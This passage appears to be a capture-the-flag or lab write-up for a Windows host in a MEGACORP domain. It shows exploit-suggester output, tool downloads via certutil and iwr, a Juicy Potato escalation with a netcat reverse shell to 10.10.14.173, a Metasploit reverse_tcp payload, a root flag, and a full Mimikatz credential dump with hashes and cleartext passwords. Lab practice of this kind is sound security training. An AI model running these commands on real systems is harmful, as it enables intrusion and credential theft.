Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Not Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Not Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Not Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable
Result: Not vulnerable
Trying pentestmonkey/windows-privesc-check:
wget https://github.com/pentestmonkey/windows-privesc-check/raw/master/windows-privesc-check2.exe
sudo python3 -m http.server 80
msf shell > certutil -urlcache -f http://10.10.15.117/windows-privesc-check2.exe ex.exe
msf shell > ex.exe --audit -a -o report -v
Trying 411Hall/JAWS:
wget https://github.com/411Hall/JAWS/raw/master/jaws-enum.ps1
sudo python3 -m http.server 80
msf shell > certutil -urlcache -f http://10.10.15.117/jaws-enum.ps1 jaws.ps1
msf shell > powershell.exe -ExecutionPolicy Bypass -File .\jaws.ps1
msf shell > execute -f powershell.exe -a "-ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt"
"Juicy Potato is a variant of the exploit that allows service accounts on Windows to escalate to SYSTEM (highest privileges) by leveraging the BITS and the SeAssignPrimaryToken or SeImpersonate privilege in a MiTM attack."
CLSID List: https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2016_Standard
Manual Escalation
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
sudo python3 -m http.server 80
msf > shell
msf > powershell
msf > iwr -outf js.exe http://10.10.14.173/JuicyPotato.exe
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.173 1111 > shell.bat
js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337 -c {FFE1E5FE-F1F0-48C8-953E-72BA272F2744}
Automatic Escalation
msf > background
msf > search ms16_075
msf > use exploit/windows/local/ms16_075_reflection_juicy
msf > set payload windows/meterpreter/reverse_tcp
msf > set session 1
msf > set lhost 10.10.14.173
msf > set dcom_port 1337
msf > set CLSID {FFE1E5FE-F1F0-48C8-953E-72BA272F2744}
msf > set lport 8464
msf > run
Result:
Server username: NT AUTHORITY\SYSTEM
cd C:\Users\Administrator\Desktop
cat root.txt
Root Flag:
6e9a9fdc6f64e410a68b847bb4b404fa
Post Exploitation
Convert to x64 shell:
use post/windows/manage/archmigrate
set session 2
set IGNORE_SYSTEM true
Get passwords
load kiwi
meterpreter > kiwi_cmd sekurlsa::logonpasswords
Output:
Authentication Id : 0 ; 298603 (00000000:00048e6b)
Session           : Interactive from 1
User Name         : sandra
Domain            : MEGACORP
Logon Server      : PATHFINDER
Logon Time        : 5/4/2020 10:20:27 PM
SID               : S-1-5-21-1035856440-4137329016-3276773158-1105
        msv :
         [00000003] Primary
         * Username   : sandra
         * Domain     : MEGACORP
         * NTLM       : 29ab86c5c4d2aab957763e5c1720486d
         * SHA1       : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38
         * DPAPI      : f4c73b3f07c4f309ebf086644254bcbc
        tspkg :
        wdigest :
         * Username   : sandra
         * Domain     : MEGACORP
         * Password   : (null)
        kerberos :
         * Username   : sandra
         * Domain     : MEGACORP.LOCAL
         * Password   : Password1234!
        ssp :
        credman :

Authentication Id : 0 ; 183955 (00000000:0002ce93)
Session           : Service from 0
User Name         : DefaultAppPool
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:24 PM
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
        msv :
         [00000003] Primary
         * Username   : SHIELD$
         * Domain     : MEGACORP
         * NTLM       : 9d4feee71a4f411bf92a86b523d64437
         * SHA1       : 0ee4dc73f1c40da71a60894eff504cc732de82da
        tspkg :
        wdigest :
         * Username   : SHIELD$
         * Domain     : MEGACORP
         * Password   : (null)
        kerberos :
         * Username   : SHIELD$
         * Domain     : MEGACORP.LOCAL
         * Password   : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
        ssp :
        credman :

Authentication Id : 0 ; 183792 (00000000:0002cdf0)
Session           : Service from 0
User Name         : wordpress
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:24 PM
SID               : S-1-5-82-698136220-2753279940-1413493927-70316276-1736946139
        msv :
         [00000003] Primary
         * Username   : SHIELD$
         * Domain     : MEGACORP
         * NTLM       : 9d4feee71a4f411bf92a86b523d64437
         * SHA1       : 0ee4dc73f1c40da71a60894eff504cc732de82da
        tspkg :
        wdigest :
         * Username   : SHIELD$
         * Domain     : MEGACORP
         * Password   : (null)
        kerberos :
         * Username   : SHIELD$
         * Domain     : MEGACORP.LOCAL
         * Password   : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : SHIELD$
Domain            : MEGACORP
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:01 PM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username   : SHIELD$
         * Domain     : MEGACORP
         * NTLM       : 9d4feee71a4f411bf92a86b523d64437
         * SHA1       : 0ee4dc73f1c40da71a60894eff504cc732de82da
        tspkg :
        wdigest :
         * Username   : SHIELD$
         * Domain     : MEGACORP
         * Password   : (null)
        kerberos :
         * Username   : shield$
         * Domain     : MEGACORP.LOCAL
         * Password   : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
        ssp :
        credman :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:08 PM
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        kerberos :
         * Username   : IUSR
         * Domain     : NT AUTHORITY
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:02 PM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        kerberos :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 65711 (00000000:000100af)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:01 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username   : SHIELD$
         * Domain     : MEGACORP
         * NTLM       : 9d4feee71a4f411bf92a86b523d64437
         * SHA1       : 0ee4dc73f1c40da71a60894eff504cc732de82da
        tspkg :
        wdigest :
         * Username   : SHIELD$
         * Domain     : MEGACORP
         * Password   : (null)
        kerberos :
         * Username   : SHIELD$
         * Domain     : MEGACORP.LOCAL
         * Password   : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
        ssp :
        credman :

Authentication Id : 0 ; 65691 (00000000:0001009b)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:01 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username   : SHIELD$
         * Domain     : MEGACORP
         * NTLM       : 9d4feee71a4f411bf92a86b523d64437
         * SHA1       : 0ee4dc73f1c40da71a60894eff504cc732de82da
        tspkg :
        wdigest :
         * Username   : SHIELD$
         * Domain     : MEGACORP
         * Password   : (null)
        kerberos :
         * Username   : SHIELD$
         * Domain     : MEGACORP.LOCAL
         * Password   : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
        ssp :
        credman :

Authentication Id : 0 ; 36390 (00000000:00008e26)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:00 PM
SID               :
        msv :
         [00000003] Primary
         * Username   : SHIELD$
         * Domain     : MEGACORP
         * NTLM       : 9d4feee71a4f411bf92a86b523d64437
         * SHA1       : 0ee4dc73f1c40da71a60894eff504cc732de82da
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : SHIELD$
Domain            : MEGACORP
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:00 PM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username   : SHIELD$
         * Domain     : MEGACORP
         * Password   : (null)
        kerberos :
         * Username   : shield$
         * Domain     : MEGACORP.LOCAL
         * Password   : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
        ssp :
        credman :
Result: Credentials Sandra:Password1234!